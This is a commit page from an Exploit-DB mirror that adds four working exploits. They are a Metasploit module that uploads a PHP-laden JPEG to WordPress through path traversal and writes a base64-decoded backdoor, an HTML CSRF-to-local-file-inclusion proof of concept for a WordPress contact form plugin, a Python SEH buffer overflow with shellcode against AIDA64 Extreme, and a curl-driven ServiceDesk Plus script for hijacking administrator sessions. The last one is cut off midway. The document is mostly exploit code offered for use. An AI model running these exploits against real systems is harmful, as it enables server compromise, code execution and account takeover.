bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-04-06

Browse source 
4 changes to exploits/shellcodes

AIDA64 Extreme 5.99.4900 - 'Logging' SEH Buffer Overflow

WordPress 5.0.0 - Crop-image Shell Upload (Metasploit)
Manage Engine ServiceDesk Plus 9.3 - Privilege Escalation
WordPress Plugin Contact Form Maker 1.13.1 - Cross-Site Request Forgery
This commit is contained in:
Offensive Security 2019-04-06 05:02:01 +00:00
parent 63dedd0b6b
commit d1b8d5e115
5 changed files with 871 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

455
exploits/php/remote/46662.rb Executable file
View file

@ -0,0 +1,455 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HTTP::Wordpress
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress Crop-image Shell Upload',
'Description' => %q{
This module exploits a path traversal and a local file inclusion
vulnerability on WordPress versions 5.0.0 and <= 4.9.8.
The crop-image function allows a user, with at least author privileges,
to resize an image and perform a path traversal by changing the _wp_attached_file
reference during the upload. The second part of the exploit will include
this image in the current theme by changing the _wp_page_template attribute
when creating a post.
This exploit module only works for Unix-based systems currently.
},
'License' => MSF_LICENSE,
'Author' =>
[
'RIPSTECH Technology', # Discovery
'Wilfried Becard <wilfried.becard@synacktiv.com>' # Metasploit module
],
'References' =>
[
[ 'CVE', '2019-8942' ],
[ 'CVE', '2019-8943' ],
[ 'URL', 'https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/']
],
'DisclosureDate' => 'Feb 19 2019',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['WordPress', {}]],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
])
end
def check
cookie = wordpress_login(username, password)
if cookie.nil?
store_valid_credential(user: username, private: password, proof: cookie)
return CheckCode::Safe
end
CheckCode::Appears
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def get_wpnonce(cookie)
uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'media-new.php')
res = send_request_cgi(
'method' => 'GET',
'uri' => uri,
'cookie' => cookie
)
if res && res.code == 200 && res.body && !res.body.empty?
res.get_hidden_inputs.first["_wpnonce"]
end
end
def get_wpnonce2(image_id, cookie)
uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
res = send_request_cgi(
'method' => 'GET',
'uri' => uri,
'cookie' => cookie,
'vars_get' => {
'post' => image_id,
'action' => "edit"
}
)
if res && res.code == 200 && res.body && !res.body.empty?
tmp = res.get_hidden_inputs
wpnonce2 = tmp[1].first[1]
end
end
def get_current_theme
uri = normalize_uri(datastore['TARGETURI'])
res = send_request_cgi!(
'method' => 'GET',
'uri' => uri
)
fail_with(Failure::NotFound, 'Failed to access Wordpress page to retrieve theme.') unless res && res.code == 200 && res.body && !res.body.empty?
theme = res.body.scan(/\/wp-content\/themes\/(\w+)\//).flatten.first
fail_with(Failure::NotFound, 'Failed to retrieve theme') unless theme
theme
end
def get_ajaxnonce(cookie)
uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
res = send_request_cgi(
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'vars_post' => {
'action' => 'query-attachments',
'post_id' => '0',
'query[item]' => '43',
'query[orderby]' => 'date',
'query[order]' => 'DESC',
'query[posts_per_page]' => '40',
'query[paged]' => '1'
}
)
fail_with(Failure::NotFound, 'Unable to reach page to retrieve the ajax nonce') unless res && res.code == 200 && res.body && !res.body.empty?
a_nonce = res.body.scan(/"edit":"(\w+)"/).flatten.first
fail_with(Failure::NotFound, 'Unable to retrieve the ajax nonce') unless a_nonce
a_nonce
end
def upload_file(img_name, wp_nonce, cookie)
img_data = %w[
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 60 00 60 00 00 FF ED 00 38 50 68 6F
74 6F 73 68 6F 70 20 33 2E 30 00 38 42 49 4D 04 04 00 00 00 00 00 1C 1C 02 74 00
10 3C 3F 3D 60 24 5F 47 45 54 5B 30 5D 60 3B 3F 3E 1C 02 00 00 02 00 04 FF FE 00
3B 43 52 45 41 54 4F 52 3A 20 67 64 2D 6A 70 65 67 20 76 31 2E 30 20 28 75 73 69
6E 67 20 49 4A 47 20 4A 50 45 47 20 76 38 30 29 2C 20 71 75 61 6C 69 74 79 20 3D
20 38 32 0A FF DB 00 43 00 06 04 04 05 04 04 06 05 05 05 06 06 06 07 09 0E 09 09
08 08 09 12 0D 0D 0A 0E 15 12 16 16 15 12 14 14 17 1A 21 1C 17 18 1F 19 14 14 1D
27 1D 1F 22 23 25 25 25 16 1C 29 2C 28 24 2B 21 24 25 24 FF DB 00 43 01 06 06 06
09 08 09 11 09 09 11 24 18 14 18 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24
24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24
24 24 24 24 24 24 24 FF C0 00 11 08 00 C0 01 06 03 01 22 00 02 11 01 03 11 01 FF
C4 00 1F 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06
07 08 09 0A 0B FF C4 00 B5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7D 01
02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 A1 08 23 42 B1 C1
15 52 D1 F0 24 33 62 72 82 09 0A 16 17 18 19 1A 25 26 27 28 29 2A 34 35 36 37 38
39 3A 43 44 45 46 47 48 49 4A 53 54 55 56 57 58 59 5A 63 64 65 66 67 68 69 6A 73
74 75 76 77 78 79 7A 83 84 85 86 87 88 89 8A 92 93 94 95 96 97 98 99 9A A2 A3 A4
A5 A6 A7 A8 A9 AA B2 B3 B4 B5 B6 B7 B8 B9 BA C2 C3 C4 C5 C6 C7 C8 C9 CA D2 D3 D4
D5 D6 D7 D8 D9 DA E1 E2 E3 E4 E5 E6 E7 E8 E9 EA F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FF
C4 00 1F 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06
07 08 09 0A 0B FF C4 00 B5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00
01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 A1 B1 C1 09
23 33 52 F0 15 62 72 D1 0A 16 24 34 E1 25 F1 17 18 19 1A 26 27 28 29 2A 35 36 37
38 39 3A 43 44 45 46 47 48 49 4A 53 54 55 56 57 58 59 5A 63 64 65 66 67 68 69 6A
73 74 75 76 77 78 79 7A 82 83 84 85 86 87 88 89 8A 92 93 94 95 96 97 98 99 9A A2
A3 A4 A5 A6 A7 A8 A9 AA B2 B3 B4 B5 B6 B7 B8 B9 BA C2 C3 C4 C5 C6 C7 C8 C9 CA D2
D3 D4 D5 D6 D7 D8 D9 DA E2 E3 E4 E5 E6 E7 E8 E9 EA F2 F3 F4 F5 F6 F7 F8 F9 FA FF
DA 00 0C 03 01 00 02 11 03 11 00 3F 00 3C 3F 3D 60 24 5F 47 45 54 5B 30 5D 60 3B
3F 3E
]
img_data = [img_data.join].pack('H*')
img_name += '.jpg'
boundary = "#{rand_text_alphanumeric(rand(10) + 5)}"
post_data = "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"name\"\r\n"
post_data << "\r\n#{img_name}\r\n"
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"action\"\r\n"
post_data << "\r\nupload-attachment\r\n"
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"_wpnonce\"\r\n"
post_data << "\r\n#{wp_nonce}\r\n"
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"async-upload\"; filename=\"#{img_name}\"\r\n"
post_data << "Content-Type: image/jpeg\r\n"
post_data << "\r\n#{img_data}\r\n"
post_data << "--#{boundary}--\r\n"
print_status("Uploading payload")
upload_uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'async-upload.php')
res = send_request_cgi(
'method' => 'POST',
'uri' => upload_uri,
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data,
'cookie' => cookie
)
fail_with(Failure::UnexpectedReply, 'Unable to upload image') unless res && res.code == 200 && res.body && !res.body.empty?
print_good("Image uploaded")
res = JSON.parse(res.body)
image_id = res["data"]["id"]
update_nonce = res["data"]["nonces"]["update"]
filename = res["data"]["filename"]
return filename, image_id, update_nonce
end
def image_editor(img_name, ajax_nonce, image_id, cookie)
uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
res = send_request_cgi(
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'vars_post' => {
'action' => 'image-editor',
'_ajax_nonce' => ajax_nonce,
'postid' => image_id,
'history' => '[{"c":{"x":0,"y":0,"w":400,"h":300}}]',
'target' => 'all',
'context' => '',
'do' => 'save'
}
)
fail_with(Failure::NotFound, 'Unable to access page to retrieve filename') unless res && res.code == 200 && res.body && !res.body.empty?
filename = res.body.scan(/(#{img_name}-\S+)-/).flatten.first
fail_with(Failure::NotFound, 'Unable to retrieve file name') unless filename
filename << '.jpg'
end
def change_path(wpnonce2, image_id, filename, current_date, path, cookie)
uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
res = send_request_cgi(
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'vars_post' => {
'_wpnonce' => wpnonce2,
'action' => 'editpost',
'post_ID' => image_id,
'meta_input[_wp_attached_file]' => "#{current_date}#{filename}#{path}"
}
)
end
def crop_image(image_id, ajax_nonce, cookie)
uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
res = send_request_cgi(
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'vars_post' => {
'action' => 'crop-image',
'_ajax_nonce' => ajax_nonce,
'id' => image_id,
'cropDetails[x1]' => 0,
'cropDetails[y1]' => 0,
'cropDetails[width]' => 400,
'cropDetails[height]' => 300,
'cropDetails[dst_width]' => 400,
'cropDetails[dst_height]' => 300
}
)
end
def include_theme(shell_name, cookie)
uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post-new.php')
res = send_request_cgi(
'method' => 'POST',
'uri' => uri,
'cookie' => cookie
)
if res && res.code == 200 && res.body && !res.body.empty?
wpnonce2 = res.body.scan(/name="_wpnonce" value="(\w+)"/).flatten.first
post_id = res.body.scan(/"post":{"id":(\w+),/).flatten.first
fail_with(Failure::NotFound, 'Unable to retrieve the second wpnonce and the post id') unless wpnonce2 && post_id
post_title = Rex::Text.rand_text_alpha(10)
uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
res = send_request_cgi(
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'vars_post' => {
'_wpnonce'=> wpnonce2,
'action' => 'editpost',
'post_ID' => post_id,
'post_title' => post_title,
'post_name' => post_title,
'meta_input[_wp_page_template]' => "cropped-#{shell_name}.jpg"
}
)
fail_with(Failure::NotFound, 'Failed to retrieve post id') unless res && res.code == 302
post_id
end
end
def check_for_base64(cookie, post_id)
uri = normalize_uri(datastore['TARGETURI'])
# Test if base64 is on target
test_string = 'YmFzZTY0c3BvdHRlZAo='
res = send_request_cgi!(
'method' => 'GET',
'uri' => uri,
'cookie' => cookie,
'vars_get' => {
'p' => post_id,
'0' => "echo #{test_string} | base64 -d"
}
)
fail_with(Failure::NotFound, 'Unable to retrieve response to base64 command') unless res && res.code == 200 && !res.body.empty?
fail_with(Failure::NotFound, "Can't find base64 decode on target") unless res.body.include?("base64spotted")
# Execute payload with base64 decode
@backdoor = Rex::Text.rand_text_alpha(10)
encoded = Rex::Text.encode_base64(payload.encoded)
res = send_request_cgi!(
'method' => 'GET',
'uri' => uri,
'cookie' => cookie,
'vars_get' => {
'p' => post_id,
'0' => "echo #{encoded} | base64 -d > #{@backdoor}.php"
}
)
fail_with(Failure::NotFound, 'Failed to send payload to target') unless res && res.code == 200 && !res.body.empty?
send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php"),
'cookie' => cookie
)
end
def wp_cleanup(shell_name, post_id, cookie)
print_status('Attempting to clean up files...')
uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
res = send_request_cgi(
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'vars_post' => { 'action' => "query-attachments" }
)
fail_with(Failure::NotFound, 'Failed to receive a response for uploaded file') unless res && res.code == 200 && !res.body.empty?
infos = res.body.scan(/id":(\d+),.*filename":"cropped-#{shell_name}".*?"delete":"(\w+)".*"id":(\d+),.*filename":"cropped-x".*?"delete":"(\w+)".*"id":(\d+),.*filename":"#{shell_name}".*?"delete":"(\w+)"/).flatten
id1, id2, id3 = infos[0], infos[2], infos[4]
delete_nonce1, delete_nonce2, delete_nonce3 = infos[1], infos[3], infos[5]
for i in (0...6).step(2)
res = send_request_cgi(
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'vars_post' => {
'action' => "delete-post",
'id' => infos[i],
'_wpnonce' => infos[i+1]
}
)
end
uri1 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'edit.php')
res = send_request_cgi(
'method' => 'GET',
'uri' => uri1,
'cookie' => cookie
)
if res && res.code == 200 && res.body && !res.body.empty?
post_nonce = res.body.scan(/post=#{post_id}&action=trash&_wpnonce=(\w+)/).flatten.first
fail_with(Failure::NotFound, 'Unable to retrieve post nonce') unless post_nonce
uri2 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
res = send_request_cgi(
'method' => 'GET',
'uri' => uri2,
'cookie' => cookie,
'vars_get' => {
'post' => post_id,
'action' => 'trash',
'_wpnonce' => post_nonce
}
)
fail_with(Failure::NotFound, 'Unable to retrieve response') unless res && res.code == 302
res = send_request_cgi(
'method' => 'GET',
'uri' => uri1,
'cookie' => cookie,
'vars_get' => {
'post_status' => "trash",
'post_type' => 'post',
'_wpnonce' => post_nonce
}
)
if res && res.code == 200 && res.body && !res.body.empty?
nonce = res.body.scan(/post=#{post_id}&action=delete&_wpnonce=(\w+)/).flatten.first
fail_with(Failure::NotFound, 'Unable to retrieve nonce') unless nonce
send_request_cgi(
'method' => 'GET',
'uri' => uri2,
'cookie' => cookie,
'vars_get' => {
'post' => post_id,
'action' => 'delete',
'_wpnonce' => nonce
}
)
end
end
end
def exploit
fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
print_status("Authenticating with WordPress using #{username}:#{password}...")
cookie = wordpress_login(username, password)
fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
print_good("Authenticated with WordPress")
store_valid_credential(user: username, private: password, proof: cookie)
print_status("Preparing payload...")
@current_theme = get_current_theme
wp_nonce = get_wpnonce(cookie)
@current_date = Time.now.strftime("%Y/%m/")
img_name = Rex::Text.rand_text_alpha(10)
@filename1, image_id, update_nonce = upload_file(img_name, wp_nonce, cookie)
ajax_nonce = get_ajaxnonce(cookie)
@filename1 = image_editor(img_name, ajax_nonce, image_id, cookie)
wpnonce2 = get_wpnonce2(image_id, cookie)
change_path(wpnonce2, image_id, @filename1, @current_date, '?/x', cookie)
crop_image(image_id, ajax_nonce, cookie)
@shell_name = Rex::Text.rand_text_alpha(10)
change_path(wpnonce2, image_id, @filename1, @current_date, "?/../../../../themes/#{@current_theme}/#{@shell_name}", cookie)
crop_image(image_id, ajax_nonce, cookie)
print_status("Including into theme")
post_id = include_theme(@shell_name, cookie)
check_for_base64(cookie, post_id)
wp_cleanup(@shell_name, post_id, cookie)
end
def on_new_session(client)
client.shell_command_token("rm wp-content/uploads/#{@current_date}#{@filename1[0...10]}*")
client.shell_command_token("rm wp-content/uploads/#{@current_date}cropped-#{@filename1[0...10]}*")
client.shell_command_token("rm -r wp-content/uploads/#{@current_date}#{@filename1[0...10]}*")
client.shell_command_token("rm wp-content/themes/#{@current_theme}/cropped-#{@shell_name}.jpg")
client.shell_command_token("rm #{@backdoor}.php")
end
end

141
exploits/php/webapps/46661.html Normal file
View file

@ -0,0 +1,141 @@
# Exploit Title: Contact Form by WD [CSRF → LFI]
# Date: 2019-03-17
# Exploit Author: Panagiotis Vagenas
# Vendor Homepage: http://web-dorado.com/
# Software Link: https://wordpress.org/plugins/contact-form-maker
# Version: 1.13.1
# Tested on: WordPress 5.1.1
Description
-----------
Plugin implements the following AJAX actions:
- `manage_fm`
- `get_stats`
- `generete_csv`
- `generete_xml`
- `formmakerwdcaptcha`
- `nopriv_formmakerwdcaptcha`
- `formmakerwdmathcaptcha`
- `nopriv_formmakerwdmathcaptcha`
- `product_option`
- `FormMakerEditCountryinPopup`
- `FormMakerMapEditinPopup`
- `FormMakerIpinfoinPopup`
- `show_matrix`
- `FormMakerSubmits`
- `FormMakerSQLMapping`
- `select_data_from_db`
- `manage`
All of them call the function `form_maker_ajax_fmc`. This function
dynamicaly loads a file defined in `$_GET['action']` or
`$_POST['action']` if the former is not defined. Because of the way
WordPress defines the AJAX action a user could define the plugin action
in the `$_GET['action']` and AJAX action in `$_POST['action']`.
Leveraging that and the fact that no sanitization is performed on the
`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
file using directory traversal thus leading to Local File Inclusion
vulnerability.
The following AJAX actions are available only for the paid version of
the plugin:
- `paypal_info`
- `checkpaypal`
- `nopriv_checkpaypal`
- `get_frontend_stats`
- `nopriv_get_frontend_stats`
- `frontend_show_map`
- `nopriv_frontend_show_map`
- `frontend_show_matrix`
- `nopriv_frontend_show_matrix`
- `frontend_paypal_info`
- `nopriv_frontend_paypal_info`
- `frontend_generate_csv`
- `nopriv_frontend_generate_csv`
- `frontend_generate_xml`
- `nopriv_frontend_generate_xml`
- `FMShortocde`
- `wd_bp_dismiss`
In both free and paid versions, there are no-privilege actions that can
be exploited by unauthenticated users in order to include local files.
PoC
---
```html
<form method="post"
action="http://wp-csrf-new.test/wp-admin/admin-ajax.php?action=../../../../../index.php">
<label>AJAX action:
<select name="action">
<optgroup label="Free version">
<option value="FMShortocde_fmc">FMShortocde_fmc</option>
<option
value="FormMakerEditCountryinPopup_fmc">FormMakerEditCountryinPopup_fmc</option>
<option
value="FormMakerIpinfoinPopup_fmc">FormMakerIpinfoinPopup_fmc</option>
<option
value="FormMakerMapEditinPopup_fmc">FormMakerMapEditinPopup_fmc</option>
<option
value="FormMakerSQLMapping_fmc">FormMakerSQLMapping_fmc</option>
<option
value="FormMakerSubmits_fmc">FormMakerSubmits_fmc</option>
<option
value="formmakerwdcaptcha_fmc">formmakerwdcaptcha_fmc</option>
<option
value="formmakerwdmathcaptcha_fmc">formmakerwdmathcaptcha_fmc</option>
<option
value="frontend_show_matrix_fmc">frontend_show_matrix_fmc</option>
<option value="generete_csv_fmc">generete_csv_fmc</option>
<option value="generete_xml_fmc">generete_xml_fmc</option>
<option value="get_stats_fmc">get_stats_fmc</option>
<option value="manage_fmc">manage_fmc</option>
<option value="manage_fm_fmc">manage_fm_fmc</option>
<option
value="nopriv_formmakerwdcaptcha_fmc">nopriv_formmakerwdcaptcha_fmc</option>
<option
value="nopriv_formmakerwdmathcaptcha_fmc">nopriv_formmakerwdmathcaptcha_fmc</option>
<option
value="product_option_fmc">product_option_fmc</option>
<option
value="select_data_from_db_fmc">select_data_from_db_fmc</option>
<option value="wd_bp_dismiss_fmc">wd_bp_dismiss_fmc</option>
</optgroup>
<optgroup label="Pro Version">
<option value="paypal_info_fmc">paypal_info_fmc</option>
<option value="checkpaypal_fmc">checkpaypal_fmc</option>
<option
value="nopriv_checkpaypal_fmc">nopriv_checkpaypal_fmc</option>
<option
value="nopriv_get_frontend_stats_fmc">nopriv_get_frontend_stats_fmc</option>
<option
value="get_frontend_stats_fmc">get_frontend_stats_fmc</option>
<option
value="frontend_show_map_fmc">frontend_show_map_fmc</option>
<option
value="nopriv_frontend_show_map_fmc">nopriv_frontend_show_map_fmc</option>
<option value="show_matrix_fmc">show_matrix_fmc</option>
<option
value="nopriv_frontend_show_matrix_fmc">nopriv_frontend_show_matrix_fmc</option>
<option
value="frontend_paypal_info_fmc">frontend_paypal_info_fmc</option>
<option
value="nopriv_frontend_paypal_info_fmc">nopriv_frontend_paypal_info_fmc</option>
<option
value="frontend_generate_csv_fmc">frontend_generate_csv_fmc</option>
<option
value="nopriv_frontend_generate_csv_fmc">nopriv_frontend_generate_csv_fmc</option>
<option
value="frontend_generate_xml_fmc">frontend_generate_xml_fmc</option>
<option
value="nopriv_frontend_generate_xml_fmc">nopriv_frontend_generate_xml_fmc</option>
</optgroup>
</select>
</label>
<button type="submit" value="Submit">Submit</button>
</form>
```

91
exploits/windows/local/46660.py Executable file
View file

@ -0,0 +1,91 @@
#!/usr/bin/python #
# Exploit Title: AIDA64 Extreme 5.99.4900 - Logging SEH Buffer Overflow #
# Date: 2019-04-02 #
# Vendor Homepage: https://www.aida64.com #
# Software Link: http://download.aida64.com/aida64extreme599.exe #
# Mirror Link : https://www.nikktech.com/main/downloads/finalwire/aida64extreme599.exe #
# Exploit Author: Peyman Forouzan #
# Tested Version: 5.99.4900 #
# Tested on: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit #
# Special Thanks to my wife #
# Steps : #
# 1- Run python code : Aida64-Extreme.py ( Two files are created ) #
# 2- App --> File --> Preferences --> Hardware Monitoring --> Logging --> paste in contents from the #
# exploit-x32.txt or exploit-x64.txt (depend on your windows version) #
# into "Log sensor reading to CSV log file : " --> OK #
# 3- File --> Exit (Do not directly close the program window, If you want to do this, #
# some codes must be changed - See the comments in code) #
# --> Shellcode (Calc) open #
#---------------------------------------------------------------------------------------------------------#
bufsize1 = 1120 # for windows-x32
#bufsize1 = 1088 # for windows-x32 - if you directly close the program window
bufsize2 = 1114 # for windows-x64
#bufsize2 = 1082 # for windows-x64 - if you directly close the program window
#msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f python -a x86 --platform windows -v calc
calc = ""
calc += "\x89\xe2\xdb\xd5\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49"
calc += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
calc += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
calc += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
calc += "\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x6d\x38\x6f"
calc += "\x72\x35\x50\x75\x50\x45\x50\x45\x30\x4c\x49\x79\x75"
calc += "\x64\x71\x49\x50\x52\x44\x4e\x6b\x70\x50\x64\x70\x6c"
calc += "\x4b\x31\x42\x44\x4c\x4e\x6b\x73\x62\x57\x64\x4e\x6b"
calc += "\x71\x62\x44\x68\x56\x6f\x78\x37\x32\x6a\x31\x36\x45"
calc += "\x61\x39\x6f\x6c\x6c\x45\x6c\x30\x61\x33\x4c\x65\x52"
calc += "\x44\x6c\x47\x50\x49\x51\x7a\x6f\x46\x6d\x37\x71\x4a"
calc += "\x67\x39\x72\x78\x72\x46\x32\x32\x77\x4c\x4b\x43\x62"
calc += "\x76\x70\x4c\x4b\x43\x7a\x47\x4c\x4e\x6b\x52\x6c\x62"
calc += "\x31\x52\x58\x4a\x43\x51\x58\x37\x71\x68\x51\x70\x51"
calc += "\x6e\x6b\x36\x39\x45\x70\x75\x51\x7a\x73\x4c\x4b\x42"
calc += "\x69\x45\x48\x5a\x43\x36\x5a\x37\x39\x4e\x6b\x56\x54"
calc += "\x6e\x6b\x73\x31\x4a\x76\x74\x71\x59\x6f\x4c\x6c\x69"
calc += "\x51\x5a\x6f\x44\x4d\x77\x71\x48\x47\x64\x78\x79\x70"
calc += "\x33\x45\x79\x66\x34\x43\x53\x4d\x5a\x58\x75\x6b\x51"
calc += "\x6d\x76\x44\x63\x45\x79\x74\x51\x48\x4c\x4b\x30\x58"
calc += "\x31\x34\x65\x51\x38\x53\x53\x56\x6e\x6b\x34\x4c\x30"
calc += "\x4b\x6e\x6b\x46\x38\x57\x6c\x63\x31\x49\x43\x4e\x6b"
calc += "\x34\x44\x6e\x6b\x35\x51\x38\x50\x6e\x69\x30\x44\x34"
calc += "\x64\x35\x74\x31\x4b\x63\x6b\x45\x31\x73\x69\x63\x6a"
calc += "\x62\x71\x39\x6f\x6b\x50\x33\x6f\x53\x6f\x52\x7a\x4e"
calc += "\x6b\x72\x32\x38\x6b\x6c\x4d\x53\x6d\x32\x4a\x43\x31"
calc += "\x6c\x4d\x6f\x75\x4c\x72\x45\x50\x77\x70\x67\x70\x76"
calc += "\x30\x42\x48\x35\x61\x6c\x4b\x30\x6f\x4c\x47\x49\x6f"
calc += "\x59\x45\x4f\x4b\x38\x70\x4e\x55\x4e\x42\x36\x36\x65"
calc += "\x38\x6d\x76\x4c\x55\x4d\x6d\x6f\x6d\x79\x6f\x39\x45"
calc += "\x55\x6c\x55\x56\x73\x4c\x74\x4a\x4f\x70\x39\x6b\x6b"
calc += "\x50\x53\x45\x47\x75\x4d\x6b\x43\x77\x54\x53\x31\x62"
calc += "\x50\x6f\x61\x7a\x77\x70\x32\x73\x39\x6f\x48\x55\x45"
calc += "\x33\x73\x51\x50\x6c\x65\x33\x36\x4e\x53\x55\x62\x58"
calc += "\x63\x55\x53\x30\x41\x41"
jmpback1 = "\xe9\xa0\xfb\xff\xff" # Jmp back
#jmpback1 = "\xe9\xc0\xfb\xff\xff" # Jmp back - if you directly close the program window
jmpback2 = "\xe9\xa6\xfb\xff\xff" # Jmp back
#jmpback2 = "\xe9\xc6\xfb\xff\xff" # Jmp back- if you directly close the program window
nseh = "\xeb\xf9\x90\x90" # Jmp Short back
seh = "\x02\xeb\x1a\x01" # Overwrite Seh # 0x011aeb02 : {pivot 8}
buffer = calc
buffer += "\x41" * (bufsize1-len(buffer)-len(jmpback1))
buffer += jmpback1
buffer += nseh
buffer += seh
print "[+] Creating %s bytes payload for windows-x32 ..." %len(buffer)
f = open ("exploit-x32.txt", "w")
print "[+] File created!"
f.write(buffer)
f.close()
buffer = calc
buffer += "\x41" * (bufsize2-len(buffer)-len(jmpback2))
buffer += jmpback2
buffer += nseh
buffer += seh
print "[+] Creating %s bytes payload for windows-x64 ..." %len(buffer)
f = open ("exploit-x64.txt", "w")
print "[+] File created!"
f.write(buffer)
f.close()

180
exploits/windows/webapps/46659.py Executable file
View file

@ -0,0 +1,180 @@
#!/usr/bin/python
# Exploit Title: Manage Engine ServiceDesk Plus Version 9.3 Privileged Account Hijacking
# Date: 30-03-2019
# Exploit Author: Ata Hakçıl, Melih Kaan Yıldız
# Vendor: ManageEngine
# Vendor Homepage: www.manageengine.com
# Product: Service Desk Plus
# Version: 9.3
# Tested On: Windows 10 64 bit
# CVE : 2019-10008
# How to use: Change the host, low_username, low_password and high_username variables depending on what you have.
# Low username and password is an account you have access to. high_username is account you want to authenticate as.
# After running the script, it will output you the cookies that you can set on your browser to login to the high_username without password.
# Run this script on a Linux OS.
#Host ip address + port
host="localhost:8080"
#set to https if needed
url = "http://" + host
#Username with credentials you have
low_username="guest"
low_password="guest"
#username you want to login as
high_username="administrator"
print("\033[1;37mUrl: \033[1;32m" + url)
print("\033[1;37mUser with low priv: \033[1;32m" + low_username + ':' + low_password)
print("\033[1;37mUser to bypass authentication to: \033[1;32m" + high_username)
print("\033[1;32mGetting a session id\033[1;37m")
# Get index page to capture a session id
curl = "curl -i -s -k -X $'GET' \
-H $'Host: "+host+"' -H $'Referer: "+url+"/' -H $'Connection: close'\
$'"+url+"/'"
out = os.popen('/bin/bash -c "' + curl+'"').read()
sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
print("Sessid:")
print(sessid)
print("\033[1;31mLogging in with low privilege user\033[1;37m")
#Attempt login post request
curl="curl -i -s -k -X $'POST' -H $'Host: "+host+"'\
-H $'Referer: "+url+"/'\
-H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \
-b $'JSESSIONID="+sessid+"' \
--data-binary $'j_username="+low_username+"&j_password="+low_password+"&LDAPEnable=false&\
hidden=Select+a+Domain&hidden=For+Domain&AdEnable=false&DomainCount=0&LocalAuth=No&LocalAuthWithDomain=No&\
dynamicUserAddition_status=true&localAuthEnable=true&logonDomainName=-1&loginButton=Login&checkbox=checkbox' \
$'"+url+"/j_security_check'"
out = os.popen('/bin/bash -c "' + curl+'"').read()
#Instead of following redirects with -L, following manually because we don't need all the transactions.
curl="curl -i -s -k -X $'GET' -H $'Host: "+host+"'\
-H $'Referer: "+url+"/'\
-H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \
-b $'JSESSIONID="+sessid+"' \
$'"+url+"/'"
out = os.popen('/bin/bash -c "' + curl+'"').read()
print("\033[1;32mCaptured authenticated cookies.\033[1;37m")
sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
print(sessid)
sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]
print(sessidsso)
grbl = re.findall("(?<=Set-Cookie: )[^=]*=[^;]*",out)
grbl2 = []
for cookie in grbl:
cl = cookie.split('=')
if cl[0]!='JSESSIONID' and cl[0]!='JSESSIONIDSSO' and cl[0]!='_rem':
grbl2.append(cl[0])
grbl2.append(cl[1])
curl = "curl -i -s -k -X $'GET' \
